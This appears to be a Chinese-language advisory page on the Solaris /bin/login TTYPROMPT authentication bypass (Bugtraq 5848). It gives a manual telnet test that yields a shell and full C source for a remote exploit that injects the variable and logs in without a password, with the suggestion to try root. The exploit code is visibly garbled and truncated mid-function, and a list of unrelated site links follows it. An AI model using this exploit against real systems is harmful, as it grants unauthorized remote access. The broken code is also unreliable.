SunSolaris/bin/login验证绕过漏洞

受影响系统：

Sun login

- Sun Solaris 8.0 x86

- Sun Solaris 8.0 SPARC

- Sun Solaris 7.0 SPARC

- Sun Solaris 7.0

- Sun Solaris 2.6 SPARC

- Sun Solaris 2.6

描述：

--------------------------------------------------------------------------------

BUGTRAQ ID: 5848

Solaris 2.6, 7, 和8的/bin/login存在一个漏洞，可以通过环境变量TTYPROMPT绕过验证。

远程攻击者只需在telnet里给环境变量TTYPROMPT简单定义成长度为6的字符串，然后连接上远程主机，再输入用户名，后面跟64个" c"，最后加一个回车就可以以这个用户直接登陆到系统而不需要口令验证。如果系统允许root用户远程登陆，就可以直接得到root用户的控制权。

链接：http://marc.theaimsgroup.com/?l=bugtraq&m=103357889303304&w=2

*

测试方法：

--------------------------------------------------------------------------------

Jonathan Stuart （jons@ccpartnersltd.com）提供了如下测试方法：

coma% telnet

telnet environ define TTYPROMPT abcdef

telnet o localhost

SunOS 5.8

bin c c c c c c c c c c c c c c c c c c c c c c c c c c c c c c c c c c c

c c c c c c c c c c c c c c c c c c c c c c c c c c c c c\n

Last login: whenever

$ whoami

bin

lion（lion@cnhonker.net） 提供了如下测试程序：

/******************************************************************

Solaris 2.6, 7, and 8 /bin/login TTYPROMPT remote exploit.

Tested for:

SunOS 5.5, 5.5.1, 5.6, 5.7, 5.8 Sparc

SunOS 5.7, 5.8 x86

Code by lion

lion@cnhonker.net

Welcome to HUC website http://www.cnhonker.com

******************************************************************/

#include

#include

#include

#include

#include

#include

#include

#include

#include #define BUFLEN 1024char shellcode[]= "\x97\x97\x97\x97\x97\x97";void usage(char *p){printf("Usage: %s [-u user] [-p port]\n\n", p);printf(" -u: login username (default: bin), try \"root\" :)\n");printf(" -p: port to use (default: 23)\n\n");printf("\n");exit(0);}void msg(char *msg){perror(msg);exit(errno);}u_int32_t get_ip(char *host){struct hostent *hp;if(!(hp = gethostbyname(host))){fprintf(stderr, "cannot resolve %s\n", host);return(0);}return(*(u_int32_t *)hp-h_addr_list[0]);}int get_socket(char *target, int port){int sock;u_int32_t ip;struct sockaddr_in sin;if(!(ip = get_ip(target)))return(0);bzero(&sin, sizeof(sin));sin.sin_family = AF_INET;sin.sin_port = htons(port);sin.sin_addr.s_addr = ip;if(!(sock = socket(AF_INET, SOCK_STREAM, 0))msg("socket");if(connect(sock, (struct sockaddr *)&sin, sizeof(sin))msg("connect");return(sock);}void send_wont(int sock, int option){char buf[3], *ptr=buf;*ptr++ = IAC;*ptr++ = WONT;*ptr++ = (unsigned char)option;if(write(sock, buf, 3)msg("write");return;}void send_will(int sock, int option){char buf[3], *ptr=buf;*ptr++ = IAC;*ptr++ = WILL;*ptr++ = (unsigned char)option;if(write(sock, buf, 3)msg("write");return;}void send_do(int sock, int option){char buf[3], *ptr=buf;*ptr++ = IAC;*ptr++ = DO;*ptr++ = (unsigned char)option;if(write(sock, buf, 3)msg("write");return;}void send_env(int sock, char *name, char *value){char buf[BUFLEN], *ptr = buf;*ptr++ = IAC;*ptr++ = SB;*ptr++ = TELOPT_NEW_ENVIRON;*ptr++ = TELQUAL_IS;*ptr++ = NEW_ENV_VAR;strncpy(ptr, name, BUFLEN-20);ptr += strlen(ptr);*ptr++ = NEW_ENV_VALUE;strncpy(ptr, value, (&buf[BUFLEN-1] - ptr)-1);ptr += strlen(ptr);*ptr++ = IAC;*ptr++ = SE;if(write(sock, buf, (ptr - buf))msg("write");return;}void do_negotiate(int sock){send_wont(sock, TELOPT_TTYPE);send_wont(sock, TELOPT_NAWS);send_wont(sock, TELOPT_LFLOW);send_wont(sock, TELOPT_LINEMODE);send_wont(sock, TELOPT_XDISPLOC);send_will(sock, TELOPT_LFLOW);send_will(sock, TELOPT_LINEMODE);send_wont(sock, TELOPT_OLD_ENVIRON);send_will(sock, TELOPT_NEW_ENVIRON);send_will(sock, TELOPT_BINARY);send_env(sock, "TTYPROMPT", shellcode);return;}void write_attack_buf(int sock, char *user){char outbuf[128],*s_buf;int i, j;if(!(s_buf = (char *)calloc(BUFLEN*2, 1)))msg("malloc");strcpy(outbuf, user);for(i = 0; i{strcat(outbuf, " c");}strcat(outbuf, "\n");printf("send to target:\n%s\n", outbuf);if(write(sock, outbuf, strlen(outbuf))msg("write");/* -- 2 reads for reading the garbage which screws up term -- */if((j = read(sock, s_buf, BUFLEN))msg("read");if((j = read(sock, s_buf, BUFLEN))msg("read");free(s_buf);return;}int main(int argc, char **argv){int c, n, sockfd, port = 23;char buf[2048], *shellstr="cd /; id; pwd; uname -a;\r\n";char user[36], host[36];fd_set rset;printf("============================================================\n");printf("Solaris 5.6 7 8 telnetd Remote exploit\n");printf("Tested for:\nSunOS 5.5, 5.5.1, 5.6, 5.7, 5.8 Sparc\nSunOS 5.7, 5.8 x86\n");printf("Code by lion, Welcome to HUC website http://www.cnhonker.com\n\n");if(argcstrcpy(user, "bin");while((c = getopt(argc, argv, "h:u:p:")) != EOF){switch(c){case 'h':strncpy(host, optarg, 36);break;case 'u':strncpy(user,optarg, 36);break;case 'p':port = atoi(optarg);break;}}if(!(sockfd = get_socket(host, port)))exit(-1);do_negotiate(sockfd);n = read(sockfd, buf, sizeof(buf));write_attack_buf(sockfd,user);send_wont(sockfd, TELOPT_BINARY);sleep(1);read(sockfd, buf, sizeof(buf));write(sockfd, shellstr, strlen(shellstr));n = read(sockfd, buf, sizeof(buf));FD_ZERO(&rset);for(;;){FD_SET(0, &rset);FD_SET(sockfd, &rset);if(select(sockfd+1, &rset, NULL, NULL, NULL)msg("select");if(FD_ISSET(sockfd, &rset)){bzero(buf, sizeo

• ·SUN网络管理平台简介
• ·SUNOS作业系统简介
• ·ＳｕｎＥ１００００在青海证券网络中的应用
• ·在Solaris和Linux之间实现IPSec
• ·司马彦字帖精品-生字练习册七年级上册(人教新目
• ·修改solarisx86启动的等待时间
• ·Solaris9i的SWAP分区管理
• ·保护SUNSolaris系统安全
• ·Solaris中的Shell和用户权限
• ·把UNIX应用程序移植到Linux